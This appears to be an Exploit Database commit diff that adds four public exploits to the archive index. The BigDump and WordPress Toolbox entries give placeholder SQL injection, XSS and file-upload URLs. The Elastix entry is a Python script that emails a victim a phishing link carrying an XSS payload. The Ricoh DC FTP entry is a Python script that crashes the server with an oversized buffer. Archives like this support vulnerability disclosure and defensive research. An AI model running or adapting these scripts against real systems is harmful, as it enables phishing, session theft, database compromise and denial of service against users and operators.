DB: 2015-09-04
4 new exploits
This commit is contained in:
parent
37dce18f7f
commit
578ab2f6aa
5 changed files with 99 additions and 0 deletions
|
@ -34366,6 +34366,7 @@ id,file,description,date,author,platform,type,port
|
|||
38049,platforms/multiple/remote/38049.txt,"Greenstone Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0
|
||||
38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin 'ajaxfilemanager.php' Script Arbitrary File Upload Vulnerability",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - XSS Vulnerabilities",2015-09-01,"Sébastien Morin",php,webapps,80
|
||||
38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21
|
||||
38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,"_ Un_N0n _",windows,dos,0
|
||||
38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
|
||||
38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
|
||||
|
@ -34383,3 +34384,6 @@ id,file,description,date,author,platform,type,port
|
|||
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
|
||||
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
|
||||
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0
|
||||
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
|
||||
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
13
platforms/php/webapps/38076.txt
Executable file
13
platforms/php/webapps/38076.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/56744/info
|
||||
|
||||
BigDump is prone to a cross-site scripting vulnerability, an SQL-injection vulnerability, and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, upload arbitrary files, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
BigDump 0.29b and 0.32b are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/bigdump.php?start= [SQL]
|
||||
|
||||
http://www.example.com/bigdump.php?start= [XSS]
|
||||
|
||||
http://www.example.com/bigdump.php [File Upload]
|
9
platforms/php/webapps/38077.txt
Executable file
9
platforms/php/webapps/38077.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56745/info
|
||||
|
||||
The Toolbox theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Toolbox 1.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-content/Themes/toolbox/include/flyer.php?mls=[Sqli]
|
51
platforms/php/webapps/38078.py
Executable file
51
platforms/php/webapps/38078.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
source: http://www.securityfocus.com/bid/56746/info
|
||||
|
||||
Elastix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Elastix 2.3.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#! /usr/bin/python
|
||||
# Author cheki
|
||||
# Date 28/11/2012
|
||||
# Test on Linux(mint)
|
||||
# Vendor Elastix.org
|
||||
# Exploit: https://192.168.2.199/xmlservices/E_book.php?Page=2%3Cscript%3Ealert%28%221%22%29;%3C/script%3E
|
||||
# Vulnerability $Page Parameter {E_book.php file}
|
||||
# $Page = $_GET['Page']; // Page index
|
||||
# $idx_phone = $_GET['phone']; // phone's address book index
|
||||
# if ( $Page == 0 )
|
||||
# {
|
||||
# $Page = 1;
|
||||
# }
|
||||
|
||||
import smtplib
|
||||
|
||||
from email.mime.multipart import MIMEMultipart
|
||||
from email.mime.text import MIMEText
|
||||
me = "your mail"
|
||||
target_mail = "target mail"
|
||||
msg = MIMEMultipart('alternative')
|
||||
msg['Subject'] = "Link"
|
||||
msg['From'] = me
|
||||
msg['To'] = target_mail
|
||||
text = "Hi!\nHow are you?\nHere is the link you wanted"
|
||||
html = """\
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<p>Hi!<br>
|
||||
How are you?<br>
|
||||
Here is the <a href="https://192.168.2.199/xmlservices/E_book.php?Page=2%3Cscript%3Ealert%28%221%22%29;%3C/script%3E">link</a> you wanted.
|
||||
</p>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
part1 = MIMEText(text, 'plain')
|
||||
part2 = MIMEText(html, 'html')
|
||||
msg.attach(part1)
|
||||
msg.attach(part2)
|
||||
s = smtplib.SMTP('localhost')
|
||||
s.sendmail(me, target_mail, msg.as_string())
|
||||
s.quit()
|
22
platforms/windows/dos/38052.py
Executable file
22
platforms/windows/dos/38052.py
Executable file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
|
||||
# Date: 8/31/2015
|
||||
# Exploit Author: j2x6
|
||||
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
|
||||
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
|
||||
# Version: 1.1.0.8
|
||||
# Tested on: Windows 7
|
||||
# Offset for Buffer Overflow attempt: 495
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import socket
|
||||
|
||||
badthing= "A" * 81300
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.45.11',21))
|
||||
s.send(badthing+'\r\n')
|
||||
s.send(badthing+'\r\n')
|
||||
s.send('\r\n')
|
||||
s.send('EXIT\r\n')
|
||||
s.close()
|
Loading…
Add table
Reference in a new issue